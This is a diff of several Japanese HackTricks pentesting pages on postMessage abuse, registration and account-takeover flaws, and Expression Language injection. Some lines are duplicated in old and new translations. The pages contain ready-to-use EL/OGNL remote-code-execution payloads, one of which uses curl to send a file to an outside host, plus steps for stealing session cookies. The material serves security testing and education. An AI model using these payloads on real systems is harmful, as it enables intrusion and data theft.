次のページでは、**メイン**ページを送信する前に**ブロック**して**子のiframe**に送信された**機密postmessageデータ**を盗む方法を示しています。そして、**子のXSSを悪用**してデータが受信される前にデータを**漏洩**させます:
次のページでは、**データを送信する前にメインページをブロック**し、**子のiframe**に送信された**機密性の高いpostmessageデータ**を盗む方法を見ることができます。そして、**子のXSSを悪用**して、データが受信される前に**データを漏洩**させます:
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
@ -182,7 +192,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
### iframeの場所を変更してメッセージを盗む
もしX-Frame-Headerを持たないウェブページに別のiframeを含めることができる場合、その子iframeの場所を変更できます。そのため、**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**origin**を自分が**制御**するページに**変更**してメッセージを**盗む**ことができます:
もしX-Frame-Headerを持たないウェブページに別のiframeを含めることができる場合、その子iframeの場所を変更できます。そのため、**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジンを自分が制御するページに変更**し、メッセージを**盗む**ことができます:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -190,11 +200,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
### postMessageからPrototype Pollutionおよび/またはXSSへ
`postMessage`を介して送信されるデータがJSによって実行されるシナリオでは、**ページ**に**iframe**を挿入し、**prototype pollution/XSS**を悪用して、`postMessage`を介してエクスプロイトを送信できます。
`postMessage`を介して送信されたデータがJSによって実行されるシナリオでは、**ページをiframe化**し、**prototype pollution/XSSを悪用**して、攻撃を`postMessage`を介して送信することができます。
`postMessage`を介して**非常によく説明されたXSS**の例は、[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html) で見つけることができます。
**`postMessage`を介して非常によく説明されたXSSの例**は、[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)で見つけることができます。
**Prototype Pollutionを悪用してからXSS**を行うエクスプロイトの例を示します。これは`iframe``postMessage`を介して送信されます
**Prototype Pollutionを悪用し、その後XSSを行う**ための攻撃例を示す、`iframe`への`postMessage`を介したエクスプロイトの例
```html
<html>
<body>
@ -210,7 +220,7 @@ setTimeout(get_code, 2000);
</body>
</html>
```
**さらに情報を入手するには**
**さらに情報をるには**
* [**プロトタイプ汚染**](../deserialization/nodejs-proto-prototype-pollution/)に関するページへのリンク
* [**XSS**](../xss-cross-site-scripting/)に関するページへのリンク
@ -222,16 +232,28 @@ setTimeout(get_code, 2000);
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* 練習用: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**</strong>で**ゼロからヒーローまでのAWSハッキングを学ぶ**</summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

66
pentesting-web/registration-vulnerabilities.md
View file

@ -6,14 +6,28 @@
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
- **ハッキングテクニックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
- **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出**してください
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 登録の乗っ取り
### 重複登録
@ -24,7 +38,7 @@ HackTricksをサポートする他の方法
- \+1@
- メールにいくつかのドットを追加
- メール名に特殊文字(%00、%09、%20
- メールの後に黒い文字を追加`test@test.com a`
- メールの後に黒い文字を入れる`test@test.com a`
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
@ -34,12 +48,12 @@ HackTricksをサポートする他の方法
### パスワードポリシー
ユーザーを作成するにパスワードポリシーを確認します(弱いパスワードを使用できるかどうかを確認します)。\
ユーザーを作成するときにパスワードポリシーを確認します(弱いパスワードを使用できるかどうかを確認します)。\
その場合、資格情報をブルートフォースで試すことができます。
### SQLインジェクション
[**このページをチェック**](sql-injection/#insert-statement)して、登録フォームで**SQLインジェクション**を使用してアカウント乗っ取りを試みたり情報を抽出したりする方法を学びます。
[**このページをチェック**](sql-injection/#insert-statement)して、登録フォームで**SQLインジェクション**を使用してアカウント乗っ取りを試みたり情報を抽出したりする方法を学びます。
### Oauth乗っ取り
@ -55,12 +69,12 @@ HackTricksをサポートする他の方法
### メールアドレスの変更
登録後、メールアドレスを変更し、この変更が正しく検証されるか、または任意のメールアドレスに変更できるかを確認します。
登録後、メールアドレスを変更し、この変更が正しく検証されるか、または任意のメールアドレスに変更できるかを確認します。
### その他のチェック
- **使い捨てメール**を使用できるかどうかを確認する
- **長いパスワード**>200は**DoS**につながる
- **長い** **パスワード**>200は**DoS**につながる
- アカウント作成の**レート制限**を確認する
- username@**burp\_collab**.netを使用して**コールバック**を分析する
@ -126,10 +140,10 @@ email=victim@mail.com|hacker@mail.com
### パスワードリセットトークンの漏洩 <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. 特定のメールtest@mail.comを使用してAPI/UIを介してパスワードリセットリクエストをトリガーします。
2. サーバーの応答を検査し、`resetToken` を確認します。
2. サーバーの応答を検査し、`resetToken`を確認します。
3. 次に、次のようなURLでトークンを使用します`https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### ユーザー名の衝突によるパスワードリセット <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
### ユーザー名の衝突を利用したパスワードリセット <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. 犠牲者のユーザー名と同一のユーザー名でシステムに登録しますが、ユーザー名の前後に空白が挿入されています。例:`"admin "`
2. 悪意のあるユーザー名でパスワードリセットをリクエストします。
@ -142,14 +156,14 @@ email=victim@mail.com|hacker@mail.com
### クロスサイトスクリプティングによるアカウント乗っ取り <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. アプリケーション内またはクッキーが親ドメインにスコープされている場合のサブドメイン内のXSSを見つけます`*.domain.com`
2. 現在の **セッションクッキー** を漏洩させます。
2. 現在の**セッションクッキー**を漏洩させます。
3. クッキーを使用してユーザーとして認証します。
### HTTPリクエストスマグリングによるアカウント乗っ取り <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1. **smuggler** を使用してHTTPリクエストスマグリングのタイプを検出しますCL、TE、CL.TE\
1. **smuggler**を使用してHTTPリクエストスマグリングのタイプを検出しますCL、TE、CL.TE\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. `POST / HTTP/1.1` を次のデータで上書きするリクエストを作成します:\
2. `POST / HTTP/1.1`を次のデータで上書きするリクエストを作成します:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` 目的は、被害者をburpcollabにリダイレクトしてクッキーを盗むことです。\
3. 最終リクエストは次のようになります。
```
@ -172,7 +186,7 @@ X: X
JSON Web Tokenはユーザーの認証に使用される可能性があります。
* 別のユーザーID / メールアドレスでJWTを編集する
* 別のユーザーID/メールでJWTを編集する
* 弱いJWT署名をチェックする
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
@ -183,16 +197,30 @@ JSON Web Tokenはユーザーの認証に使用される可能性があります
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗まれたマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからAWSハッキングをマスターしましょう</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

80
pentesting-web/ssti-server-side-template-injection/el-expression-language.md
View file

@ -2,40 +2,54 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションを見つけます
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れます
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するために** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、彼らのエンジンを**無料**で試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
Expression LanguageELは、JavaEEにおいてプレゼンテーション層Webページとアプリケーションロジック管理されたBeanを結びつけ、それらの相互作用を可能にするために不可欠です。主に以下で使用されます
- **JavaServer FacesJSF**UIコンポーネントをバックエンドデータ/アクションにバインドするために使用されます。
- **JavaServer PagesJSP**JSPページ内でのデータアクセスと操作に使用されます。
- **Contexts and Dependency Injection for Java EECDI**Web層と管理されたBeanの相互作用を容易にするために使用されます。
- **JavaServer FacesJSF**UIコンポーネントをバックエンドデータ/アクションにバインドするために。
- **JavaServer PagesJSP**JSPページ内でのデータアクセスと操作のために。
- **Contexts and Dependency Injection for Java EECDI**Web層と管理Beanの相互作用を容易にするために。
**使用コンテキスト**
- **Spring Framework**:セキュリティやデータなどのさまざまなモジュールで適用されます。
- **一般的な使用**Java、Kotlin、ScalaなどのJVMベースの言語で、開発者がSpEL APIを介して使用します。
ELはJavaEEテクロジ、スタンドアロン環境に存在し、`.jsp`または`.jsf`のファイル拡張子、スタックエラー、およびヘッダー内の「Servlet」などの用語を通じて認識されます。ただし、その機能や特定の文字の使用はバージョンに依存する場合があります。
ELはJavaEE技術、スタンドアロン環境に存在し、`.jsp`または`.jsf`のファイル拡張子、スタックエラー、およびヘッダーで「Servlet」という用語を通じて認識できます。ただし、その機能や特定の文字の使用はバージョンに依存する場合があります。
{% hint style="info" %}
**ELバージョン**によっては、一部の**機能**が**オン**または**オフ**になることがあり、通常一部の**文字**が**許可されない**ことがあります。
**ELバージョン**によっては、一部の**機能**が**オン**または**オフ**になることがあり、通常一部の**文字**が**許可されない**ことがあります。
{% endhint %}
## 基本例
別の興味深いELチュートリアルは[https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)で見つけることができます
(別の興味深いELチュートリアルは[https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)で見つけることができます)
[**Maven**](https://mvnrepository.com)リポジトリから以下のjarファイルをダウンロードします
[**Maven**](https://mvnrepository.com)リポジトリからのjarファイルをダウンロードします
* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
@ -67,18 +81,18 @@ System.out.println(result);
```java
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
```
アプリケーションを実行するには次のコマンドを使用してください:
アプリケーションを実行するには次のコマンドを使用してください
```java
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
{5*5}
[25]
```
前の例では、用語 `{5*5}` が**評価**されました。
Note how in the previous example the term `{5*5}` was **evaluated**.
## **CVEベースのチュートリアル**
**この投稿をチェック: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
Check it in **this post: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
## ペイロード
@ -108,7 +122,7 @@ Enter a String to evaluate:
```
### 検知
* Burp検知
* Burp 検知
```bash
gk6q${"zkz".toString().replace("k", "x")}doap2
#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
@ -149,11 +163,11 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
# With HTMl entities injection inside the template
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```
* RCE **Linux**
* RCE **linux**
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* RCE **Windows**(未検証)
* RCE **Windows** (未検証)
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
@ -195,11 +209,11 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
```
### 環境の検査
- `applicationScope` - グローバルなアプリケーション変数
- `requestScope` - リクエスト変数
- `initParam` - アプリケーションの初期化変数
- `sessionScope` - セッション変数
- `param.X` - X が HTTP パラメータの名前である場合のパラメータ値
* `applicationScope` - グローバルなアプリケーション変数
* `requestScope` - リクエスト変数
* `initParam` - アプリケーションの初期化変数
* `sessionScope` - セッション変数
* `param.X` - X が HTTP パラメータの名前である場合のパラメータ値
これらの変数を次のように String にキャストする必要があります:
```bash
@ -226,14 +240,26 @@ ${employee.FirstName}
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong>!</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**PEASSの最新バージョンにアクセス**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**PEASSの最新バージョンにアクセス**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するために、**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **💬** [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出**してください。
</details>

80
pentesting-web/unicode-injection/unicode-normalization.md
View file

@ -2,40 +2,54 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じて、ゼロからヒーローまでAWSハッキングを学びましょう</summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手する
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングテクニックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリに提出してください。
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する
- **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
</details>
**これは、[https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)の要約です。詳細についてはそちらをご覧ください(そこからの画像を取得)。
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
**これは、**[**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/) **の要約です。詳細についてはそちらをご覧ください(そこからの画像を取得)。
## Unicodeと正規化の理解
Unicode正規化は、文字の異なるバイナリ表現が同じバイナリ値に標準化されるプロセスです。このプロセスは、プログラミングやデータ処理における文字列の取り扱いにおいて重要です。Unicode標準は、2種類の文字の同等性を定義しています
Unicode正規化は、異なる文字のバイナリ表現が同じバイナリ値に標準化されるプロセスです。このプロセスは、プログラミングやデータ処理において文字列を扱う際に重要です。Unicode標準は、2種類の文字の同等性を定義しています
1. **正準同等性**:文字は、印刷または表示されたときに同じ外観と意味を持つ場合、正準的に等価と見なされます。
2. **互換性同等性**:より弱い同等性の形式で、文字は同じ抽象文字を表すかもしれませんが、異なる表示方法ができます。
2. **互換性同等性**:より弱い同等性の形式で、文字は同じ抽象的な文字を表すかもしれませんが、異なる表示方法で表示されることがあります。
**4つのUnicode正規化アルゴリズム**がありますNFC、NFD、NFKC、およびNFKD。各アルゴリズムは、正準化および互換性正規化の技術を異なる方法で使用します。詳細については、[Unicode.org](https://unicode.org/)でこれらの技術を探索できます。
**4つのUnicode正規化アルゴリズム**がありますNFC、NFD、NFKC、NFKD。各アルゴリズムは、正準および互換性正規化技術を異なる方法で使用します。詳細については、[Unicode.org](https://unicode.org/)でこれらの技術を探索できます。
### Unicodeエンコーディングの要点
Unicodeエンコーディングの理解は、異なるシステムや言語間の相互運用性の問題を取り扱う際に特に重要です。以下は主なポイントです
Unicodeエンコーディングの理解は、異なるシステムや言語間の相互運用性の問題を扱う際に特に重要です。主なポイントは次のとおりです:
- **コードポイントと文字**Unicodeでは、各文字や記号に「コードポイント」として知られる数値が割り当てられます。
- **バイト表現**コードポイントまたは文字は、メモリ内の1バイト以上で表されます。たとえば、英語圏で一般的なLATIN-1文字は1バイトを使用して表されます。ただし、より多くの文字を持つ言語では、表現に複数のバイトが必要です。
- **エンコーディング**この用語は、文字がバイトのシリーズに変換される方法を指します。UTF-8は、ASCII文字が1バイトで表され、他の文字には最大4バイトが使用される一般的なエンコーディング規格です。
- **データ処理**:データを処理するシステムは、バイトストリームを文字に正しく変換するために使用されるエンコーディングを正確に把握る必要があります。
